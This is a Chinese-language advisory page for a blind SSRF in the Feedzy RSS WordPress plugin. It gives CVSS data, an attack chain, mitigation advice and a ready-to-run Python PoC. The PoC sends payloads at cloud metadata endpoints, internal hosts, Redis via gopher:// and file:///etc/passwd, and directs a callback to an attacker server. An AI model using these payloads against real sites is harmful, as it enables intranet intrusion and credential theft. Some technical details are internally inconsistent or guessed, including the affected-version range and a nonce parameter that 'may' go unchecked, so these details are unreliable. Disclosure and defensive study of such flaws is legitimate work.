CVE-2025-11467 WordPress Feedzy RSS插件Blind SSRF漏洞

漏洞信息

漏洞编号

CVE-2025-11467

漏洞类型

Blind SSRF (盲服务端请求伪造)

CVSS评分

5.8 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator

漏洞概述

RSS Aggregator by Feedzy是WordPress平台上一款广受欢迎的订阅源聚合插件，用于自动博客、新闻订阅和YouTube视频订阅源聚合。该插件在所有版本直至5.1.1存在一处严重的安全漏洞，攻击者可利用feedzy_lazy_load函数发起Blind Server-Side Request Forgery（盲服务端请求伪造）攻击。由于是盲注类型，攻击者无法直接获取响应内容，但可以通过响应时间的差异或间接方式推断内部服务状态。此漏洞无需任何认证即可利用，影响范围覆盖数百万使用该插件的WordPress站点。攻击者可利用该漏洞探测内部网络拓扑、访问内网数据库、读取云服务元数据、扫描内部服务端口等，对企业内网安全构成严重威胁。

技术细节

漏洞根源于feedzy_lazy_load函数对用户输入的URL参数缺乏严格验证。攻击者可以通过构造特殊的URL参数，诱使服务器向任意指定目标发起HTTP请求。由于该请求是由服务器端发起的，因此可以绕过防火墙等边界防护措施，直接访问内网资源。漏洞利用的关键点在于：(1) 函数未对URL进行白名单校验或协议限制；(2) 未对目标地址进行有效过滤；(3) 支持file://、dict://、gopher://等特殊协议；(4) 可配合CRLF注入进行请求走私。攻击者通常利用此漏洞访问云服务元数据端点（如AWS 169.254.169.254）、内网Redis/Memcached未授权访问、探测内网存活主机及服务端口等。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描目标WordPress站点，确认是否安装Feedzy RSS插件及其版本

STEP 2

2. 构造恶意请求

构造包含SSRF payload的HTTP请求，以feedzy_lazy_load参数传递恶意URL

STEP 3

3. 触发漏洞

服务器接收请求后，由feedzy_lazy_load函数处理并发起对攻击者指定目标的请求

STEP 4

4. 内网探测

利用SSRF探测内网服务，如云元数据服务(169.254.169.254)、内网数据库、Redis等

STEP 5

5. 数据窃取/进一步利用

通过读取内网服务响应获取敏感信息，或利用内网服务漏洞进行横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-11467 PoC - Blind SSRF in Feedzy RSS Plugin
# Target: WordPress site with Feedzy plugin < 5.1.1

def test_ssrf(target_url, attacker_server):
    """
    Test for Blind SSRF vulnerability in feedzy_lazy_load function
    target_url: Target WordPress site URL
    attacker_server: Attacker-controlled server to receive callbacks
    """
    # Vulnerable endpoint parameters
    params = {
        'feedzy_lazy_load': '1',
        'url': f'http://{attacker_server}/test',  # SSRF payload
        'security_nonce': 'any_value'  # May be missing validation
    }
    
    # Alternative payloads for internal service probing
    payloads = [
        # AWS metadata service
        'http://169.254.169.254/latest/meta-data/',
        # Internal network scanning
        'http://192.168.1.1:80/',
        # Localhost probing
        'http://127.0.0.1:6379/',
        # File protocol (LFI)
        'file:///etc/passwd',
        # Gopher protocol for Redis
        'gopher://127.0.0.1:6379/_INFO'
    ]
    
    print(f'[*] Testing target: {target_url}')
    print(f'[*] Sending blind SSRF payloads...')
    
    for payload in payloads:
        params['url'] = payload
        try:
            response = requests.get(target_url, params=params, timeout=10)
            print(f'[+] Payload sent: {payload}')
        except requests.exceptions.RequestException as e:
            print(f'[-] Request failed: {e}')
    
    print('[*] Check attacker server logs for incoming requests')

if __name__ == '__main__':
    if len(sys.argv) < 3:
        print(f'Usage: python {sys.argv[0]} <target_url> <attacker_server>')
        sys.exit(1)
    test_ssrf(sys.argv[1], sys.argv[2])

影响范围

Feedzy RSS Feeds < 5.1.1

Feedzy RSS Feeds = 5.1.0

Feedzy RSS Feeds = 5.1.1

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：(1) 限制服务器出站流量，仅允许访问必要的外部资源；(2) 部署Web应用防火墙规则拦截包含敏感内网IP或特殊协议的请求；(3) 对feedzy_lazy_load相关接口实施临时访问控制；(4) 考虑暂时禁用Feedzy插件，待官方发布安全更新后再恢复使用；(5) 监控服务器日志，关注异常的出站HTTP请求。